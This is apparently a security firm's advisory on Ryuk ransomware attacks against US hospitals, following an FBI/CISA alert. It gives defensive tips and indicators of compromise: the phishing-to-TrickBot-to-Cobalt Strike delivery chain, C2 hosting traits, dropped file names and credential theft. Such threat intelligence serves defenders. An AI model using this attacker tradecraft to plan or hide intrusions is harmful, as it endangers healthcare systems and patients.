RE: The joint statement made by the FBI and Cybersecurity & Infrastructure Security Agency (CISA) “Ransomware Activity Targeting the Healthcare and Public Health Sector”
FRSecure has been working with the FBI and CISA, directly and indirectly since Saturday, October 24 to assist in the investigation of a credible threat to U.S. hospitals and healthcare providers. During recent incident response engagements, we’ve seen indicators of compromise (IoCs) that confirm Ryuk ransomware attacks are occurring. However, there are still concerns about the nature of such attacks.
Despite our involvement, we chose to be very careful in how we released information to the public. Feeding into any unnecessary fear, uncertainty, or doubt related to events is counter to our mission. Because the FBI and CISA have made their public announcement, we feel comfortable sharing what we know with you.
If you notice unusual activity in your technology environment or have information about an incident, please email us at for immediate assistance.
Learn More in Our Webinar
We hosted a live webinar on Friday, October 30th, at 12 p.m. CST to answer your questions about this developing threat. View the recording here.
About the Attack
The threat of a Ryuk ransomware incident is real. Many details about the joint FBI and CISA announcement are still not known, including attacker coordination, how widespread it may/may not be, timing, and context. We cannot say with certainty that this is a widespread coordinated attack.
This is developing news, and we want to make sure everyone is aware. It’s our collective responsibility to be proactive in finding indicators of compromise (IoC), sharing them with our community, taking preventative measures, and ensuring our response capabilities are effective.
Based upon the IoCs obtained during our investigations, here’s what we’ve seen.
Often, the attack starts with email phishing and/or emails containing an attachment with a malicious payload. In some cases, the attackers used malicious links or existing open connections to the internal network (RDP/TCP 3389 for instance); however, phishing has been most common initial attack vector.
See “Key Findings and Resources” below for more detailed information, but here are some immediate tips for you to limit your chances of suffering from a ransomware attack.
Tips
- Important: Ensure your data is backed up consistently and that your backups are stored off-network.
- Any network connectivity could potentially be leveraged by an attacker to destroy your backups.
- Test your restoration capabilities by testing your backups—even to the point of full/bare-metal restores.
- Report any unusual activity to your IT/security team’s attention.
- If you are able, look for common IoCs. If you suspect any are present, immediately bring to your IT/Security Team’s attention
- If you’re not experiencing anything unusual or seeing any IoCs, great! You are in a position to continue your preparation. Consider completing your own ransomware readiness assessment.
Key Findings and Resources
If you are seeing any of the indicators or activities depicted below in your environment, you could be ransomed or soon-to-be ransomed—even if systems appear to be functioning normally.
The tactics, techniques, and procedures (TTPs) outlined in this communication are or could be associated with the advanced persistent threat (APT) group known as UNC1878. UNC1878 is believed to be the primary organization involved in the joint FBI/CISA announcement.
These indicators can change quickly, and this should not be considered a full, complete, or static dataset.
- Typical Payload Delivery Method:
- Phishing email > TrickBot (malware) > Cobalt Strike (tool) > Ryuk (ransomware)
NOTE: Cobalt Strike is always used to deliver this attack. Empire (C2) and Metasploit are sometimes used in addition. - Secondary payload deployment methods include batch scripts using PSEXEC, BITSadmin, and the Windows Management Interface (WMI).
NOTE: If you see any unexpected behavior from these legitimate processes, investigate further.
- Phishing email > TrickBot (malware) > Cobalt Strike (tool) > Ryuk (ransomware)
- Typical Domains for Command and Control (C2):
- OpenProvider hosted domains
- Uses “Let’s Encrypt” SSL certificates on port 80 (http), which is typically unencrypted
- Virtual private servers hosted predominately by Choopa
- Cobalt Strike is always used on non-standard ports (not 50050)
- NOTE: Cobalt Strike beacon configured with Amazon malleable C2 profile
- Reconnaissance Tools Used:
- Credential Harvesting Tools Used:
- Typical File Names and Locations:
- Files are usually dropped at c:\user\XXX\AppData\Roaming\xxx.exe
- Names include:
- P32.exe
- P64.exe
- vVv.exe
- wmi.bat
- xxx.exe
- zZz.exe
- 1234.zip
- socks.exe
- defender.exe
- _paxe.exe
- Other Details:
- Utilizes Signed Code
- DIT (AD Database) and Registry theft
- Typically, no other data theft
- No history of extortion
- Time to ransom (TTR)
- Average: 5 days, 17 hours
- Fastest: 2 days, 6 hours
External Resources
Here are additional and credible resources you can use to assist you in preparation, detection, and response:
- CISA
- Mandiant Explainer Video
- IoC Dump (includes all IPs, known domains, and files/hashes)
- Continuous IoC for Emotet
NOTE: Our IoCs above do not incude Emotet because Emotet was not used by the
attackers in our cases. Emotet has often been seen in other Ryuk attacks.
Final Thoughts
We cannot stress enough how important it is for you to be prepared. If you see any of the IoCs listed in this bulletin in your environment, please bring them to the attention of your internal security team immediately and reach out to us. FRSecure is always here to help!
Please share this message with everyone, but especially with organizations you know in the healthcare and healthcare supply chain industry sectors. There is certainly the potential that the Ryuk threat will continue to grow.
It’s up to us to get out ahead of it.
Thank you in advance.